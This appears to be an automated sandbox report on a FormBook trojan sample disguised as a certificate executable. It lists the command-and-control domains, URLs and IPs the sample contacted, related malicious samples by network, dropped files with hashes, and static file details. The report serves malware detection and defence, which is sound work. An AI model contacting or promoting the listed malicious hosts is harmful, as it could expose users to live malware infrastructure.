            https://www.empowermedeco.com/fo8o/?Ml18S=mxnR0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?Ml18S=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&nVb4=q2L0IduHqXQ8JBmp100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truefalse
              		high
              empowermedeco.com
              		217.196.55.202
              		truefalse
                		high
                www.3xfootball.com
                		154.215.72.110
                		truefalse
                  		high
                  www.goldenjade-travel.com
                  		116.50.37.244
                  		truefalse
                    		high
                    www.rssnewscast.com
                    		91.195.240.94
                    		truefalse
                      		high
                      www.techchains.info
                      		66.29.149.46
                      		truefalse
                        		high
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truefalse
                          		high
                          www.magmadokum.com
                          		unknown
                          		unknownfalse
                            		high
                            www.donnavariedades.com
                            		unknown
                            		unknownfalse
                              		high
                              www.660danm.top
                              		unknown
                              		unknownfalse
                                		high
                                www.joyesi.xyz
                                		unknown
                                		unknownfalse
                                  		high
                                  www.liangyuen528.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.kasegitai.tokyo
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.empowermedeco.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.k9vyp11no3.cfd
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.elettrosistemista.zip
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.antonio-vivaldi.mobi
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.3xfootball.com/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.empowermedeco.com/fo8o/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.empowermedeco.com/fo8o/?Ml18S=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&nVb4=q2L0IduHqXQ8JBmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.elettrosistemista.zip/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.elettrosistemista.zip/fo8o/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.magmadokum.com/fo8o/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.rssnewscast.com/fo8o/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.goldenjade-travel.com/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.goldenjade-travel.com/fo8o/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.rssnewscast.com/fo8o/?Ml18S=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&nVb4=q2L0IduHqXQ8JBmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.techchains.info/fo8o/false
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.empowermedeco.comYpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4146974677.00000000058C9000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000003.00000002.4145972280.000000000476E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4147607697.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000003FFE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://www.sedo.com/services/parking.php3YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000003FFE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000003.00000002.4145972280.0000000004A92000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000004322000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000003.00000002.4145972280.0000000004A92000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000004322000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.empowermedeco.com/fo8o/?Ml18S=mxnRnetbtugc.exe, 00000003.00000002.4145972280.00000000050DA000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000496A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            91.195.240.94
                                                                            		www.rssnewscast.comGermany
                                                                            		47846SEDO-ASDEfalse
                                                                            154.215.72.110
                                                                            		www.3xfootball.comSeychelles
                                                                            		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                            195.110.124.133
                                                                            		elettrosistemista.zipItaly
                                                                            		39729REGISTER-ASITfalse
                                                                            116.50.37.244
                                                                            		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                            		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                            85.159.66.93
                                                                            		natroredirect.natrocdn.comTurkey
                                                                            		34619CIZGITRfalse
                                                                            66.29.149.46
                                                                            		www.techchains.infoUnited States
                                                                            		19538ADVANTAGECOMUSfalse
                                                                            217.196.55.202
                                                                            		empowermedeco.comNorway
                                                                            		29300AS-DIRECTCONNECTNOfalse

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1560696
                                                                            Start date and time:2024-11-22 07:48:06 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 10m 52s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:8
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Certificate 11-21AIS.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@14/7
                                                                            EGA Information:
                                                                            • Successful, ratio: 75%
                                                                            HCA Information:
                                                                            • Successful, ratio: 91%
                                                                            • Number of executed functions: 51
                                                                            • Number of non-executed functions: 295
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: Certificate 11-21AIS.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            01:49:49API Interceptor10768315x Sleep call for process: netbtugc.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            91.195.240.94Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            glued.htaGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            rAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            oO3ZmCAeLQ.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                            • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                            N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                            • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                            Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
                                                                            195.110.124.133Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • www.elettrosistemista.zip/fo8o/
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.elettrosistemista.zip/fo8o/
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • www.elettrosistemista.zip/fo8o/
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.elettrosistemista.zip/fo8o/
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.elettrosistemista.zip/fo8o/
                                                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                            • www.nutrigenfit.online/2vhi/
                                                                            RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                            • www.nutrigenfit.online/2vhi/
                                                                            glued.htaGet hashmaliciousFormBookBrowse
                                                                            • www.elettrosistemista.zip/fo8o/
                                                                            proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                            • www.nutrigenfit.online/xtuc/
                                                                            DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                            • www.nutrigenfit.online/uye5/

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            www.3xfootball.comCertificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            glued.htaGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            www.goldenjade-travel.comCertificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            glued.htaGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            POWERLINE-AS-APPOWERLINEDATACENTERHKCertificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                            • 156.251.17.224
                                                                            Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            https://trackru.top/usGet hashmaliciousUnknownBrowse
                                                                            • 156.244.41.195
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.92.61.37
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            REGISTER-ASITCertificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            Magnetnaalene.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 195.110.124.133
                                                                            RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            DONGFONG-TWDongFongTechnologyCoLtdTWCertificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            glued.htaGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            8UUxoKYpTx.elfGet hashmaliciousMiraiBrowse
                                                                            • 119.15.228.113
                                                                            SEDO-ASDECertificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                            • 91.195.240.19
                                                                            7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                            • 91.195.240.19

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                            Category:dropped
                                                                            Size (bytes):114688
                                                                            Entropy (8bit):0.9746603542602881
                                                                            Encrypted:false
                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\autFF01.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Certificate 11-21AIS.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):270848
                                                                            Entropy (8bit):7.991345995587925
                                                                            Encrypted:true
                                                                            SSDEEP:6144:UTw8G07Hs+h2rjJ9Cu8rL5wm4dtKWlJWjzyB3:UT5zs+h2jJ958rAflJiuB3
                                                                            MD5:8F26C4E2B133315F10EFE903DF390BB4
                                                                            SHA1:DD6FC8007F65A4A982E8418FD07D280DA6A0B33F
                                                                            SHA-256:E4BC88D782078BF850104A42B22855D993A5789EBE8887E5DC3F139FFA1A72DF
                                                                            SHA-512:B3A65CBE5CA9DE00EBA2EB2C94C0DC68AF87157F3D426F4EAC99871BBD4825FD1EBD059EBEE735B15A5C708A4377387E5C21E58F1EB13C7E10A825AB06DF8506
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.....D0HQn.Y....t.6D..zG8...GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6.HPJ\[.FQ.N.q.S..i.^.;p: +W:0[g+1$<+Dh3Sg:%$r-^h.y.h=%6!.E\<cHPJRD0H(7N.m*5..(6.z(7.H.kV .J....(6.]...n$W.._$ m*5.0HQ6GHPJ..0H.7FH."..0HQ6GHPJ.D2IZ7LHPZVD0HQ6GHPJ.Q0HQ&GHPjVD0H.6GXPJRF0HW6GHPJRD6HQ6GHPJRd4HQ4GHPJRD2H..GH@JRT0HQ6WHPZRD0HQ6WHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GH~>7<DHQ6.GTJRT0HQ&CHPZRD0HQ6GHPJRD0Hq6G(PJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6

                                                                            C:\Users\user\AppData\Local\Temp\beeish

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Certificate 11-21AIS.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):270848
                                                                            Entropy (8bit):7.991345995587925
                                                                            Encrypted:true
                                                                            SSDEEP:6144:UTw8G07Hs+h2rjJ9Cu8rL5wm4dtKWlJWjzyB3:UT5zs+h2jJ958rAflJiuB3
                                                                            MD5:8F26C4E2B133315F10EFE903DF390BB4
                                                                            SHA1:DD6FC8007F65A4A982E8418FD07D280DA6A0B33F
                                                                            SHA-256:E4BC88D782078BF850104A42B22855D993A5789EBE8887E5DC3F139FFA1A72DF
                                                                            SHA-512:B3A65CBE5CA9DE00EBA2EB2C94C0DC68AF87157F3D426F4EAC99871BBD4825FD1EBD059EBEE735B15A5C708A4377387E5C21E58F1EB13C7E10A825AB06DF8506
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.....D0HQn.Y....t.6D..zG8...GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6.HPJ\[.FQ.N.q.S..i.^.;p: +W:0[g+1$<+Dh3Sg:%$r-^h.y.h=%6!.E\<cHPJRD0H(7N.m*5..(6.z(7.H.kV .J....(6.]...n$W.._$ m*5.0HQ6GHPJ..0H.7FH."..0HQ6GHPJ.D2IZ7LHPZVD0HQ6GHPJ.Q0HQ&GHPjVD0H.6GXPJRF0HW6GHPJRD6HQ6GHPJRd4HQ4GHPJRD2H..GH@JRT0HQ6WHPZRD0HQ6WHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GH~>7<DHQ6.GTJRT0HQ&CHPZRD0HQ6GHPJRD0Hq6G(PJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6GHPJRD0HQ6

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.119437926545509
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Certificate 11-21AIS.exe
                                                                            File size:1'189'888 bytes
                                                                            MD5:8b68068b577b39f51dee9c3703ac8999
                                                                            SHA1:bbfb3d4e750b119d142791bcd2c9cd174ea5f364
                                                                            SHA256:14b355ad5cf22181635d1c97b75288d9d3668aabd57558863ef1e795561274c7
                                                                            SHA512:8a1f7d517924f128a5cc2f60ab1ee0280844b2adeb3f9ea3fa849f46326e327eed88d244544abd47c319fd345b5f9dbdf06798cef74a0303f7f63e645c0b7f7c
